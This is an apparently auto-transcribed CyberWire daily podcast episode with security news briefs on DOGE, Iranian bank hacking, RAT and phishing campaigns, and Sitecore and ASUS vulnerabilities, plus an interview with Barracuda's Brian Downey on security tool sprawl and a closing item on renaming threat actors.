Can’t DOGE the inquiry.

Dave Bittner

You're listening to the Cyberwire network, powered by N2K. And now a word from our sponsor. Spy Cloud Identity is the new battleground and attackers are exploiting stolen identities to infiltrate your organization. Traditional defenses can't keep up. Spy Cloud's holistic identity threat protection helps security teams uncover and automatically remediate hidden exposures across your users from breaches, malware and phishing to neutralize identity based threats like account takeover, fraud and ransomware. Don't let invisible threats compromise your business. Get your free corporate Darknet exposure report@spycloud.com cyberwire and see what attackers already know. That's spycloud.com cyberwire a House Oversight committee requests Doge documents from Microsoft Predatory Sparrow claims a cyber attack on an Iranian bank. Microsoft says data that happens in Europe will stay in Europe. A complex malware campaign is using heavily obfuscated Visual Basic files to deploy rats, a widely used CMS platform suffers potential rce. North Korea's Kim Suki targets academic institutions using password protected research documents. ASIS patches a high severity vulnerability in its armory crate software. CISA's new leader remains in confirmation limbo. Our guest is Brian Downey, VP of Product Management from Barracuda, talking about how security sprawl increases risk and operation Fluffy Narwhal thinks it's time to rethink adversary naming.

Brian Downey

Foreign.

Dave Bittner

It's Tuesday, June 17, 2025. I'm Dave Bittner and this is your Cyberwire Intel Briefing. Thanks for joining us here today. It's great as always to have you with us. Representative Stephen F. Lynch, Democrat from Massachusetts and acting ranking member of the Committee on Oversight and Government Reform, has requested documents from Microsoft CEO Satya Nadella regarding reports that individuals linked to Elon Musk's Department of Government Efficiency Doge tried to remove sensitive data from the National Labor Relations Board. According to NPR and whistleblower reports, Doge staff allegedly used high level access to exfiltrate data, possibly including union activities, and hid their actions by deleting logs and installing backdoors. A Doge engineer reportedly wrote code titled NX Genbedoor Extract and uploaded it to GitHub, which is owned by Microsoft. Lynch raised concerns over potential misconduct, privacy violations and conflicts of interest given Musk's history with the nlrb. In April and May of this year, Congressional Democrats launched investigations into Musk and Doge's alleged interference and data breaches at the nlrb. A hacking group known as Predatory Sparrow, believed to be tied to Israeli intelligence, claimed a cyberattack on an Iranian bank. The group says the strike was in retaliation for the bank's alleged role in funding Iran's military and nuclear programs. The attack disrupted banking services and reportedly affected gas stations, delayed salaries and closed some branches. The group claims support from brave Iranians and vowed to target institutions backing the dictator's terrorist fantasies. The hack follows rising tensions, including Israeli strikes on Iranian facilities and cyber retaliation by pro Iranian groups. Predatory Sparrow has previously hit Iran's steel and fuel sectors. While Iran has not commented. Experts see escalating cyber conflict between Iran and Israel, with hacktivists warning regional allies of Israel they could be targeted, too. Microsoft announced that data from its European cloud customers will remain in Europe, comply with EU laws and be managed by local staff. This move addresses growing concerns about foreign access to sensitive data. Microsoft also confirmed that any remote access by its engineers will be approved and monitored by European personnel. The company is expanding its cloud and AI operations in the region and plans to launch a sovereign private cloud now in preview by the end of the year. Researchers at Census have uncovered a complex malware campaign using heavily obfuscated Visual Basic script files to deploy remote access trojans. Recently discovered, the attack unfolds in three stages, beginning with bloated VBS droppers that decode base 64 payloads and launch PowerShell scripts. These scripts fetch additional malware from platforms like archive.org where where payloads are hidden in JPEG images. The campaign delivers rats such as Remcos, Asyncrat, DC Rat and Limeret. It uses resilient infrastructure via DuckDNS.org to avoid takedowns, Though similar to attacks by the Blind Eagle group, Attribution is unconfirmed. Researchers advise disabling macros, filtering emails, and monitoring PowerShell use to reduce risk. The campaign's advanced obfuscation and use of legitimate hosting services make detection and response especially challenging. Watchtower has revealed seven serious vulnerabilities in Sitecore, a widely used CMS platform powering major companies like HSBC, United Airlines and L' Oreal. Three of the flaws disclosed in a June 17 report enable unauthenticated remote code execution on Sitecore Experience Platform 4.4.10. A key issue is a hardcoded default password, which, when combined with two post auth rce bugs, creates a full pre auth RCE chain. Watchtower found over 22,000 exposed instances and warns the actual number is likely much higher. The vulnerabilities were patched in May after Sitecore was notified in February. No CVEs have been assigned yet. Watchtower urges immediate patching and credential rotation warning of the high risk to enterprise environments. Four more flaws will be detailed in a future report. A new malware campaign by North Korea linked Kim Suki is targeting academic institutions using password protected research documents to deliver multistage malware disguised as review requests from professors. Phishing emails contain Hangul word processor files with malicious OLE objects. These bypass security tools and trick recipients into opening them, launching a sophisticated infection chain. Upon activation, the malware installs six files, performs system reconnaissance and establishes remote access using AnyDesk. The campaign exploits academic trust and collaboration, making detection harder and expanding risks to connected government and private networks. The malware uses obfuscation techniques and disguises malicious actions under the appearance of legitimate documents. Analysts warn this campaign marks an evolution in social engineering, blending technical precision with realistic academic bait and urge institutions to remain vigilant. ASUS has patched a high severity vulnerability in its Armory Crate software, which could allow attackers to gain full system access. The flaw, an authorization bypass caused by a time of check time of use issue, was discovered by Cisco Talos. Attackers can exploit it by creating a hard link to bypass restrictions on a driver used by Armory Crate. The bug affects multiple versions, and users are urged to update immediately to avoid privilege escalation risks Sean Planky, President Trump's nominee to lead cisa, remains in confirmation limbo due to procedural delays and a Senate hold. Planky, a former DOE and NSC cybersecurity official, missed his June hearing over an incomplete FBI clearance, causing some confusion and postponements. Despite bipartisan support for his qualifications, his nomination is blocked by Senator Ron Wyden, who demands CISA release a 2022 report on telecom vulnerabilities linked to the Salt Typhoon hack. Wyden accuses CISA of covering up critical cybersecurity failures and says public release of the report is vital. The delay hampers a major overhaul at cisa, including proposed budget cuts and staff reductions. With former acting director Bridget Bean gone, staff are concerned about leadership gaps and the agency's uncertain future under incoming Trump appointees. Coming up after the break, my conversation with Brian Downey from Barracuda. We're talking about how secure security sprawl increases risk and operation Fluffy Narwhal thinks it's time to rethink adversary naming. Stay with us.

Sponsor Voice

Compliance regulations, third party risk and customer security demands are all growing and changing fast. Is your manual GRC program actually slowing you down? If you've ever found yourself drowning in spreadsheets, chasing down screenshots or wrangling manual processes just to keep your GRC program on track, you're not alone. But let's be clear, there is a better way. Banta's trust management platform takes the headache out of governance, risk and compliance. It automates the essentials from internal and third party risk to consumer trust, making your security posture stronger, yes, even helping to drive revenue. And this isn't just nice to have. According to a recent analysis from IDC, teams using Vanta saw a 129% boost in productivity. That's not a typo, that's real impact. So if you're ready to trade in chaos for clarity, check out Vanta and bring some serious efficiency to your GRC game. Vanta GRC how much easier trust can be? Get started@vanta.com cyber.

Dave Bittner

And now a word from our sponsor, CloudRange. Cybersecurity isn't just a technology issue. It's a people challenge. While tools can detect threats, it's the humans who decide how to respond. That's why Cloud Range uses immersive simulation based training to build real world instincts and confidence. This approach helps transform good security teams into great ones ready to face today's evolving threats. Discover how Cloud Range is empowering defenders@www.cloudrange.com. brian Downey is VP of Product Management at Barracuda. I recently sat down and talked with him about how security sprawl increases risk.

Brian Downey

We started talking to our customers and we started to hear the concerns they were having around the management of multiple security tools and how that was impacting them, really focusing on the operational inefficiencies. But as we dove in we started to see both the operational inefficiencies. But it started to also start to highlight there was some security concerns with running multiple tools as well.

Dave Bittner

Well, let's dig into some of the numbers here. There's some really interesting stats in the report. What are some of the things that rose to the top for you that really caught your attention?

Brian Downey

Yeah, I'd say there was kind of three different angles that really I thought were interesting. First of all, it just seems like a ubiquitous problem. You know, I've been telling a lot of people I I entered as I started getting into working with a lot of managed service providers a couple years back. I remember our our goal was trying to figure out how we could get them to start using security tools and have those conversations with their clients. And there was almost a hesitancy to it. And now when we looked at this report we saw almost 2/3. 65% of people that responded said our challenge has now pivoted. It's it's. They feel like we're juggling too many security tools. So you're kind of seeing the, the tide change. Where at first it was trying to get them to start leveraging the tools they needed, now they're saying, hey, wait a second, I need to tap out, I'm having too many. I also thought it was interesting when we were looking at, we expected, as you saw more security tools, you'd expect to see some impacts in cost and efficiency. And that was confirmed about 80% saying that this resulted in more time and cost they were spending. But the really surprising one for me was almost the same number. 77% said the number of tools was hindering their ability to detect and mitigate threats. And I thought that that was really surprising to see that number so high.

Dave Bittner

What leads to this? Why do organizations end up over provisioned when it comes to their security tools?

Brian Downey

I think it's a necessary, it's a necessary evil right now in security where the reality is, as you're seeing that kind of expanding attack service, we are seeing more and more customers requiring a lot of different tools to be able to support the security needs that they have and their clients have. So I think that there is a necessity to run it. But I think that what we're seeing now is the vendor landscape really hasn't provided enough assistance in helping people run that kind of plethora of security tools that are required to effectively secure them. And that's starting to lead to all sorts of new challenges. Like I said, both the time and cost, but also really simple things when you start looking at it, configuration issues. So having tools that are out there and having misconfigurations in them. Even when we saw that in the most recent Verizon data breach report, they talked about a third of issues that are discovered and breaches that occur occur from a poorly configured configuration or poorly configured tool. And you can see how that connects directly to this as you see more and more tools. How are you making sure as things change as you add new users that they're configured correctly? That's where we're starting to see some real challenges associated with that. And I think that's where the vendor community has to step up and help customers with that.

Dave Bittner

When I think about this problem, I can't help wondering if part of this is a hesitation to get rid of something, to get rid of a tool, because I think there's a natural fear that if I get rid of a tool and then a breach occurs, and that may have been the tool that could have stopped the breach.

Sponsor Voice

Boy, am I in trouble now, right?

Dave Bittner

There's an emotional component there. Do you think there's anything to that line of thinking, or am I off base there?

Brian Downey

No, I think there is. I think we're definitely seeing more and more people that are holding on to maybe security tools that aren't needed or they have picking up tools. So I definitely think that that's, that's a portion of it. I think even as you, even as you get past that side of it, though, I think it's still the, the concepts of layered security and what, what attackers can now do with AI. I think that it does require a pretty solid stack of tools right now to effectively secure, you know, even, even a small company, let alone kind of larger and midsize companies. And I think that that's something that, that's, that is going to become a, a necessity as we move forward. The companies really adjust their operations to be able to support multiple tools in their environments.

Dave Bittner

Well, you mentioned AI. What part, if any, does that play in people's ability to dial down the number of tools that they have running?

Brian Downey

I think it might help in some ways because I think tools can get more powerful. I think that you will see tools be able to expand to maybe areas that would have required two or three in the past. But I really think where AI can help even more, and this is where we're focusing a little, is trying to help with the management overhead of those tools. AI is really good at doing things like identifying when you have a misconfiguration, for example, it can understand those anomalies and be able to help you react to them. And that's something that we've done with our Barracuda one platform. It's. If we look at it and stipulate to the reality that you're going to need multiple tools that might be able to be a little more controlled than today, but it's probably going to be a reality. We're going to live with that you're going to have a lot of tools out there and you're going to have a lot of change in your environment. I think what we need to do is say, how do we simplify the management? How do we make sure that those tools can learn off one another and provide more value as you add tools rather than see that diminished value, the customers were saying in the survey.

Dave Bittner

So what are your recommendations then, for people to get on top of this?

Brian Downey

Yeah, I think it's really kind of. I think, I think you're right. I think the first one is kind of the inventory of what do you really need? What are you trying to protect against? You know, security is, at the end of the day, security is a. How it's, you know, everything we're doing is a means to an end. The, the end we're trying to do is reduce risk. So I do think you need to look at that lens and say, you know, how do all of these fit into my strategy around reducing risk? You know, what value are they providing? And, you know, are they really kind of additive to my environment? I think that, you know, you don't want to be the hoarder of security tools. You know, you want, you want to have a lean relationship, but then I think you want to then step back and say, okay, now, based on that, how do I want to manage these, how do I do this in a way that's going to be effective for my environment? And I think that that's where there's a lot of platform oriented tools that can help you. You know, Barracuda, you know, our platform focuses on that, but there's a lot of others in the industry as well where you can start to look at, you know, how can you actually take and leverage technology to be able to not only secure yourself, but to be able to apply that security in the right way that's effective for you.

Dave Bittner

Have you seen examples of folks who are having success here who have put a system in place where they're able to really dial it in effectively? I mean, are there, are there common elements for those organizations who seem to be doing well here?

Brian Downey

Yeah, I mean, I think I've seen, I've seen a lot of customers that we've worked with that have done that, and I'm sure there's others as well. I think the big thing is being able to understand how they're answering certain questions. You know, when I think about it, if you really make it very basic, it's what security do I have deployed, where, how do I need that configured and what's within those parameters and what's drifting, you need to be able to answer those questions somehow. I think there's a lot of tooling out there that can help you, but if you can't answer those, you should realize that's a big risk for your environment. And I think this problem is exacerbated. When you look at people like managed service providers, where you have a single IT shop that's managing dozens or even hundreds of customers, you can see how the problem gets bigger and bigger and bigger. At that level of scale and differentiation between those accounts.

Dave Bittner

Can we touch on integration a bit here? I mean, I think people want their tools to be able to talk to each other and get a result where the whole is greater than the sum of the parts. How important is integration in selecting these tools?

Brian Downey

Yeah, I think integration has to be kind of one of the foundational parameters you select when you're selecting a tool or look at when you're selecting a tool. And that's something that we saw even in this survey we saw the majority of people surveyed said their tools can't be integrated. I think integration comes in multiple forms. I think there's operational integration around being able to talk about some of the things that we talked about, be able to manage them, ensure that they're configured and all of those types of things in an effective way. But then there's also the second side of it, which is the alerts these tools are providing back to the customer. The security has always been something where the power is in correlation of information. Being able to understand, I see something that looks suspicious on the network, I see something that looks suspicious in the user behavior, and I see something that looks suspicious in the endpoint itself. All three of those might just be seemingly a little bit suspicious, but all three combined might be a massive risk. So I think customers need to look at both sides of integration. They need to look at how am I integrating the operational management of these tools as well as then how am I taking the data that pours out of these tools and being able to correlate that and integrate it together to be able to find more advanced threats more easily.

Dave Bittner

When you look at this report as a whole, what are the take homes for you? What do you hope security folks get out of it?

Brian Downey

I think the security folks have to start understanding kind of what is the hub in their hub and spoke model of security. I think that as you look at the vendor landscape and as you look at the tools that you're using, you need to start creating that consolidation point. And again, that's both from an operational standpoint as well as from a threat and threat analysis standpoint. But you need to build off a core and then you need to start continuing to add tools and they might be part of that vendor's portfolio or third parties, but they need to be able to integrate back to that core and provide that consistency. So that's the biggest thing I would encourage vendors, I mean customers to really understand kind of what is the core of their security. What does that hub and spoke where do they go to as a source of truth when it comes to the risks that are in their environment?

Dave Bittner

That's Brian Downey from Barracuda. And finally, when a Russian military unit hacks an election but we call them Fancy Bear, it's no wonder folks think cybersecurity is some elaborate comic book. In a sharply wry op ed for Just Security, Jen Easterly and Kieran Martin argue it's time to stop branding our cyber adversaries like Pokemon and start naming them for what they nation states and criminals. Microsoft and CrowdStrike's recent alliance to align threat actor names is a welcoming baby step, but Easterly and Martin say it's not enough. Until the cybersecurity world adopts a single, clear vendor neutral naming system, we'll keep confusing defenders and glamorizing adversaries. The idea that naming can't be standardized is, they argue, nonsense. We do it in medicine, defense, and even for missiles. So why not malware? It's time to ditch the marketing mascots. Let's trade Charming Kitten for Iranian espionage and call the cybercriminals what they are without the flare. Hallelujah. And that's the Cyberwire. For links to all of today's stories, check out our daily briefing@thecyberwire.com we'd love to hear from you. We're conducting our annual audience survey to learn more about our listeners. We're collecting your interest through the end of this summer. There's a link in the show notes and we do hope you'll check it out. N2K senior producer is Alice Carruth. Our Cyberwire producer is Liz Stokes. We're mixed by Trey Hester with original music and sound design by Elliot Peltzman. Our executive producer is Jennifer Ibin. Peter Kilpe is our publisher and I'm Dave Bittner. Thanks for listening. We'll see you back here tomorrow. Hey everybody, Dave here. I've talked about Delete Me before and I'm still using it because it still works. It's been a few months now, and I'm just as impressed today as I was when I signed up. Deleteme keeps finding and removing my personal information from data broker sites, and they keep me updated with detailed reports so I know exactly what's been taken down. I'm genuinely relieved. Knowing my privacy isn't something I have to worry about every day. The Delete Me team handles everything. It's the set it and forget it peace of mind. And it's not just for individuals. DeleteMe also offers solutions for businesses helping companies protect their employees personal information and reduce exposure to social engineering and phishing threats. And right now, our listeners get a special 20% off your DeleteMe plan. Just go to JoinDeleteMe.com N2K and use promo code N2K at checkout. That's JoinDeleteMe.com N2k. Code N2K.